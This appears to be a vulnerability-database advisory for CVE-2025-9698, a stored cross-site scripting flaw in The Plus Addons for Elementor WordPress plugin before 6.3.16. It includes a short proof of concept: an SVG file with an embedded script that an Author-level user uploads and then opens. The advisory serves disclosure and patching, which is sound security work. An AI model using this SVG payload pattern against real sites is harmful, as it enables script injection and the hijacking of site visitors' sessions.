The Plus Addons for Elementor < 6.3.16 – Author+ Stored XSS | CVE 2025-9698 | Plugin Vulnerabilities

Description

The plugin does not sanitize SVG file contents, which could allow users with minimum role access as Author to perform Stored Cross-Site Scripting attacks.

Proof of Concept

1. Go to Media Library.
2. Upload the SVG file, including the XSS payload, as below:

<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400" viewBox="0 0 124 124" fill="none">
<rect width="124" height="124" rx="24" fill="#000000"/>
<script type="text/javascript">  
      alert("Stored XSS");
</script>
</svg>

3. Go to the URL of the SVG file: 
https://example.com/wp-content/uploads/2025/08/<file_name>.svg

Affects Plugins

the-plus-addons-for-elementor-page-builder

Fixed in 6.3.16

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Tan Nguyen

Submitter

Tan Nguyen

Verified

Yes

WPVDB ID

a9539def-d92b-4117-b36a-17015c578d89

Timeline

Publicly Published

2025-09-22 (about 3 months ago)

Added

2025-09-22 (about 3 months ago)

Last Updated

2025-09-22 (about 3 months ago)

Other

Published

Title

Published

2024-11-18

Title

Extensions for Elementor <= 2.0.40 - Reflected Cross-Site Scripting

Published

2023-03-21

Title

Drag and Drop Multiple File Upload PRO - Contact Form 7 with Remote Storage Integrations < 5.0.6.4 - Reflected Cross-Site Scripting

Published

2014-08-01

Title

Cloak & Encrypt < 2.0 - Cross-Site Scripting (XSS)

Published

2025-01-07

Title

Smart Agenda < 4.8 - Stored XSS via CSRF

Published

2025-08-27

Title

WooTour < 3.6.4 - Reflected Cross-Site Scripting